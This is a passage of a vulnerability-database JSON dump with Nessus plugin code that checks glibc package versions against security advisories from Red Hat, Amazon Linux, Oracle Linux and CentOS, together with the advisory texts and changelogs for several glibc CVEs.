https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?056c0c27\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1526\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1526\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:20:59", "description": "An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)", "edition": 25, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : glibc (ALAS-2012-39)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:glibc-debuginfo", "p-cpe:/a:amazon:linux:glibc-devel", "p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-static", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:glibc-headers"], "id": "ALA_ALAS-2012-39.NASL", "href": "https://www.tenable.com/plugins/nessus/69646", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-39.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69646);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2011-4609\");\n script_xref(name:\"ALAS\", value:\"2012-39\");\n script_xref(name:\"RHSA\", value:\"2012:0058\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2012-39)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-39.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update glibc' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.47.32.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.47.32.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "[2.5-65.el5_7.3]\n- Use correct type when casting d_tag (#767687)\n- Report write error in addmnt even for cached streams (#767687)\n- ldd: Never run file directly (#767687).\n- Workaround misconfigured system (#767687)\n[2.5-65.el5_7.2]\n- Check values from TZ file header (#767687)", "edition": 4, "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0126", "href": "http://linux.oracle.com/errata/ELSA-2012-0126.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "[2.3.4-2.57]\n- Use malloc as needed in fnmatch (#769360)\n[2.3.4-2.56]\n- Fix handling if newline in addmntent (#769360)\n- Use correct type when casting d_tag (#769360).\n- Properly quite output of local (#769360)\n- Check size of pattern in wide character representation in fnmatch (#769360)\n- Report write error in addmnt even for cached streams (#769360)\n- ldd: Never run file directly (#769360).\n- Check values from TZ file header (#767685)\n- Workaround misconfigured system (#767685)\n[2.3.4-2.55]\n- Require exact glibc version in nscd (#657009)", "edition": 4, "modified": "2012-02-13T00:00:00", "published": "2012-02-13T00:00:00", "id": "ELSA-2012-0125", "href": "http://linux.oracle.com/errata/ELSA-2012-0125.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "description": "[2.12-1.47]\n- Don't start AVC thread until credentials are installed (#700507)\n[2.12-1.46]\n- Update systemtaparches\n[2.12-1.45]\n- Update configure script\n[2.12-1.44]\n- Add gdb hooks (#711927)\n[2.12-1.43]\n- Don't assume AT_PAGESIZE is always available (#739184)\n- Define IP_MULTICAST_ALL (#738763)\n[2.12-1.42]\n- Avoid race between {,__de}allocate_stack and __reclaim_stacks during\n fork (#738665)\n[2.12-1.41]\n- Locale-independent parsing in libintl (#737778)\n[2.12-1.40]\n- Change setgroups to affect all the threads in the process (#736346)\n[2.12-1.39]\n- Make sure AVC thread has capabilities (#700507)\n- Fix memory leak in dlopen with RTLD_NOLOAD (#699724)\n[2.12-1.38]\n- Build libresolv with stack protector (#730379)\n[2.12-1.37]\n- Maintain stack alignment when cancelling threads (#731042)\n[2.12-1.36]\n- Fix missing debuginfo (#729036)\n[2.12-1.35]\n- Report write error in addmnt even for cached streams (#688980,\n CVE-2011-1089)\n- Handle Lustre filesystem (#712248)\n[2.12-1.34]\n- Query NIS domain only when needed (#718057)\n- Update: Use mmap for allocation of buffers used for __abort_msg\n (#676591)\n[2.12-1.33]\n- Don't use gethostbyaddr to determine canonical name (#714823)\n[2.12-1.32]\n- ldd: never run file directly (#713134)\n[2.12-1.31]\n- Support Intel processor model 6 and model 0x2c (#695595)\n- Optimize memcpy for SSSE3 (#695812)\n- Optimize strlen for SSE2 (#695963)\n[2.12-1.30]\n- Support f_flags in Linux statfs implementation (#711987)\n[2.12-1.29]\n- Avoid overriding CFLAGS (#706903)\n[2.12-1.28]\n- Use mmap for allocation of buffers used for __abort_msg (#676591)\n[2.12-1.27]\n- Fix PLT use due to __libc_alloca_cutoff\n- Schedule nscd cache pruning more accurately from re-added values\n (#703481)\n- Fix POWER4 optimized strncmp to not read past differing bytes\n (#694386)\n[2.12-1.26]\n- Create debuginfo-common on biarch platforms (#676467)\n- Use Rupee sign in Indian locales (#692838)\n- Signal temporary host lookup errors in nscd as such to the requester\n (#703480)\n- Define initgroups callback for nss_files (#705465)", "edition": 4, "modified": "2011-12-14T00:00:00", "published": "2011-12-14T00:00:00", "id": "ELSA-2011-1526", "href": "http://linux.oracle.com/errata/ELSA-2011-1526.html", "title": "glibc security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "description": "[2.12-1.47.el6_2.5]\n- Avoid high cpu usage when accept fails with EMFILE (#767692)\n[2.12-1.47.el6_2.4]\n- Make implementation of ARENAS_TEST and ARENAS_MAX match\n documentation (#769594)\n- Check malloc arena atomically (#769594)\n[2.12-1.47.el6_2.3]\n- Check values from TZ file header (#767692)\n[2.12-1.47.el6_2.2]\n- Correctly reparse group line after enlarging the buffer\n (#766484)\n[2.12-1.47.el6_2.1]\n- Fix grouping and reuse other locales in various locales (#754116)", "edition": 4, "modified": "2012-01-24T00:00:00", "published": "2012-01-24T00:00:00", "id": "ELSA-2012-0058", "href": "http://linux.oracle.com/errata/ELSA-2012-0058.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:27:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0126\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030466.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0126.html", "edition": 3, "modified": "2012-02-14T03:06:54", "published": "2012-02-14T03:06:54", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030466.html", "id": "CESA-2012:0126", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:07", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0125\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030465.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-profile\nglibc-utils\nnptl-devel\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0125.html", "edition": 4, "modified": "2012-02-14T02:09:08", "published": "2012-02-14T02:09:08", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030465.html", "id": "CESA-2012:0125", "title": "glibc, nptl, nscd security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0058\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs:\n\n* glibc had incorrect information for numeric separators and groupings for\nspecific French, Spanish, and German locales. Therefore, applications\nutilizing glibc's locale support printed numbers with the wrong separators\nand groupings when those locales were in use. With this update, the\nseparator and grouping information has been fixed. (BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing glibc to\nincorrectly parse groups with more than 126 members, resulting in\napplications such as \"id\" failing to list all the groups a particular user\nwas a member of. With this update, group parsing has been fixed.\n(BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this update,\nthe race condition has been fixed, and malloc's behavior is now consistent\nwith the documentation regarding the MALLOC_ARENA_TEST and MALLOC_ARENA_MAX\nenvironment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-January/030435.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0058.html", "edition": 3, "modified": "2012-01-30T20:26:30", "published": "2012-01-30T20:26:30", "href": "http://lists.centos.org/pipermail/centos-announce/2012-January/030435.html", "id": "CESA-2012:0058", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2011-1089", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "modified": "2017-09-08T12:08:12", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0126", "href": "https://access.redhat.com/errata/RHSA-2012:0126", "type": "redhat", "title": "(RHSA-2012:0126) Moderate: glibc security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 